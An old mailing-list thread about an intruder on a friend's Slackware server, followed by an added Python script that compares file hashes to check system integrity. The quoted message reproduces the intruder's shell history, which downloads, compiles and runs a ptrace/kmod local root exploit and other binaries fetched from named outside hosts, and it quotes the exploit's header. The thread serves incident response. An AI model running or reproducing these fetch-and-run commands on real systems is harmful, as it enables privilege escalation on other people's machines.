Re: Visited by a cracker

From: Alexander Economou (aecongnet.gr)
Date: Tue Jul 13 2004 - 03:57:41 CDT



 I think it would be best to contact the owner of the credit card first
and check whether the charge on her card was made with her approval.

 Slackware is, if not the most, one of the most secure Linux distros. You
said that the box has Slack 10 installed, which is less than a month
old. Thus there are always unpublished 'ways' to get root access (which in
your situation is needed to alter system files on the box), but from the
log you posted I don't think the particular person has anything to do with
this kind of information.

 A simple but not fast way to check the integrity of your box is to
install Slack 10 on another box and compare the md5 checksums of the
preinstalled files between the two boxes.

 It is also a good idea to consider finding a way (pam maybe?) to prevent
common users from "consuming" 100% of your cpu power.

> Hello
>
> I've had a rather disturbing evening.
> A friend of mine runs a small server for himself and some friends. It's
> running Slackware 10.
> When I logged in, I noticed that the load was way over what's normal
> (around 1.36 now, usually it's under 0.10), so I ran 'top'. I saw a
> program called 'strace' running, hogging all the cpu power.
>
> So I got curious. I chdir'ed to the user's home and looked around. It's
> empty. But the 'smart' little cracker has forgotten about .bash_history,
> so here I can see everything that he has been doing.
> Apparently, he has downloaded and set up an eggdrop, removed it again, and
> then downloaded a psybnc, which he also removed shortly after. Then things
> get interesting.
>
> <SNIP>
> wget http://personal.telefonica.terra.es/web/alexb/e/ptrace-kmod.c
> gcc ptrace-kmod.c -o ptrace
> ./ptrace
> chmod +x ptrace
> ./ptrace
> rm -rf ptrace
> ls
> rm -rf ptrace-kmod.c
> wget www.drac.as.ro/egx
> chmod +x egx
> ./egx
> who
> passwd
> Uptime
> <SNIP>
> ./egx
> rm -rf egx
> wget 220.88.27.11/usage/apache.tar.gz
> </SNIP>
>
> The ptrace-kmod.c has this for a header:
> /*
> * Linux kernel ptrace/kmod local root exploit
> *
> * This code exploits a race condition in kernel/kmod.c, which creates
> * kernel thread in insecure manner. This bug allows to ptrace cloned
> * process, allowing to take control over privileged modprobe binary.
> *
> * Should work under all current 2.2.x and 2.4.x kernels.
>
> Luckily, the server runs 2.6.6, so this wasn't any threat.
> The 'egx' executable seems to be somewhat like the other, because when I
> run it, it outputs '[-] Unable to determine kernel address: Operation not
> supported' and dies.
>
> My guess is that the apache.tar.gz file is also some kind of exploit,
> but I couldn't get it, so I didn't get a chance to see.
>
> Seeing that he didn't know how to properly hide his tracks, I hoped he
> might be stupid enough to use his own IP to log in from as well, so I ran
> 'cat /var/log/messages | grep <username>'.
> But he has logged in and out using 7 different IPs: 5 belonging to
> Pakistan, and the other two to Lebanon.
>
> I've been suspicious of this user since my friend added him a few days
> ago. He actually got a domain, prepaid for three years for an account, so
> I did have some concerns about this.
> Now, after discovering this, I've talked with my friend, and the credit
> card used to pay for the domain belongs to a woman in the UK. Probably
> stolen or something.
>
> I've run chkrootkit 0.43 and Rootkit Hunter 1.1.1 and they didn't find
> anything.
> So, my real question is:
>
> Is there anything else I should check out? Anywhere else some nasty
> exploits or trojans might be hiding? And should I try to find this guy?
> Or is it probably hopeless?
>
> Best Regards,
> Per Christian B. Viken
>
> - --------------------------------------------
> _
> ASCII ribbon campaign ( )
> - against HTML email X
> & vCards / \
>
>
>

--
Alexander Economou
GNET NOC
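The integrity check Alexander suggests (hash every preinstalled file on a clean Slack 10 install and compare against the suspect box) can be scripted so that the output is a short list of modified, missing and unexpected files instead of two raw md5sum listings to eyeball. The following Python script is an added example written for this page, not code from either poster: it builds a manifest (relative path to digest) for a directory tree, diffs two manifests, and in `demo()` constructs a throwaway "clean" tree and a "suspect" tree with one trojaned binary, one deleted binary and one extra file under `tmp/egx` (the file names and contents are constructed for the demo). The hash algorithm is a parameter; it defaults to SHA-256 rather than the md5 named in the reply, because md5 collisions are cheap enough today that a patched binary can be made to keep its md5.

```python
"""Compare a suspect filesystem tree against a known-good tree of the same install.

Added example: builds per-file digests for two directory trees and reports what
differs. On real boxes you would run build_manifest() on the clean install and on
the suspect machine separately, save each as a file, and diff the saved manifests.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def hash_file(path, algo="sha256"):
    """Digest a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, algo="sha256"):
    """Map relative POSIX path -> digest for every regular file under root.

    Symlinks are skipped (os.walk does not follow symlinked dirs by default, and
    a symlinked file would be hashed through its target, which hides the link).
    """
    root = Path(root)
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue
            manifest[p.relative_to(root).as_posix()] = hash_file(p, algo)
    return manifest


def compare_manifests(baseline, suspect):
    """Return sorted lists of files that changed, vanished, or appeared.

    baseline: manifest taken from the clean install
    suspect:  manifest taken from the machine under investigation
    """
    modified = sorted(p for p in baseline if p in suspect and baseline[p] != suspect[p])
    missing = sorted(p for p in baseline if p not in suspect)   # deleted on suspect
    extra = sorted(p for p in suspect if p not in baseline)     # not part of the install
    return {"modified": modified, "missing": missing, "extra": extra}


def demo():
    """Constructed scenario: identical trees, then tamper with the suspect copy."""
    with tempfile.TemporaryDirectory() as tmp:
        clean = Path(tmp) / "clean"
        suspect = Path(tmp) / "suspect"
        # Constructed stand-ins for preinstalled files; contents are placeholders.
        files = {
            "bin/ls": b"ls binary",
            "bin/ps": b"ps binary",
            "etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
        }
        for root in (clean, suspect):
            for rel, data in files.items():
                f = root / rel
                f.parent.mkdir(parents=True, exist_ok=True)
                f.write_bytes(data)
        # Simulated tampering on the suspect box only:
        (suspect / "bin/ps").write_bytes(b"trojaned ps")        # replaced binary
        (suspect / "bin/ls").unlink()                           # deleted binary
        dropped = suspect / "tmp/egx"                           # file the clean box lacks
        dropped.parent.mkdir(parents=True, exist_ok=True)
        dropped.write_bytes(b"unknown binary")
        return compare_manifests(build_manifest(clean), build_manifest(suspect))


if __name__ == "__main__":
    result = demo()
    for kind, paths in result.items():
        for p in paths:
            print(f"{kind:9s} {p}")
```

Two caveats when using this against a real box: hash the suspect disk from a clean boot medium (a rescue CD or the disk mounted on the clean machine), because a kernel-level rootkit can lie to a hashing tool running on the compromised kernel; and expect legitimate differences in files that are edited after install (for example `/etc/passwd`, and anything under `/var`), so compare the package-owned binaries and libraries first and treat the rest as a separate list.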